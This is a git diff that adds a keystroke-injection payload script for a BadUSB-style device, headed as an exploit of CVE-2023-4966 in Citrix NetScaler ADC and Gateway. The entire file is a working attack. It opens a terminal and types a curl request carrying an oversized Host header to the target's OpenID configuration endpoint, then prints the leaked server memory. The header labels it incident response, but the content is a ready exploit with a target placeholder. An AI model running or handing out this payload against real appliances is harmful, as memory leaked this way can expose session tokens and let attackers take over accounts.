diff --git a/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt new file mode 100644 index 00000000..f829d408 --- /dev/null +++ b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt @@ -0,0 +1,48 @@ +* REM ################################################################################## +* REM # # +* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : incident-response # +* REM # Target : Citrix NetScaler ADV; NetScaler Gateway # +* REM # # +* REM ################################################################################## + +* REM GNU/Linux Version + +QUACK DELAY 3000 +QUACK CTRL-ALT t +QUACK DELAY 1000 + +QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n') +QUACK ENTER +QUACK DELAY 500 +QUACK STRING headers="-H 'Host:$header_value'" +QUACK ENTER +QUACK DELAY 500 + +* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +QUACK ENTER +QUACK DELAY 500 + +QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "--- Dumped memory ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "$response" | cut -c 131051- +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "--- End ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING else +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "Could not dump memory" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING fi +QUACK ENTER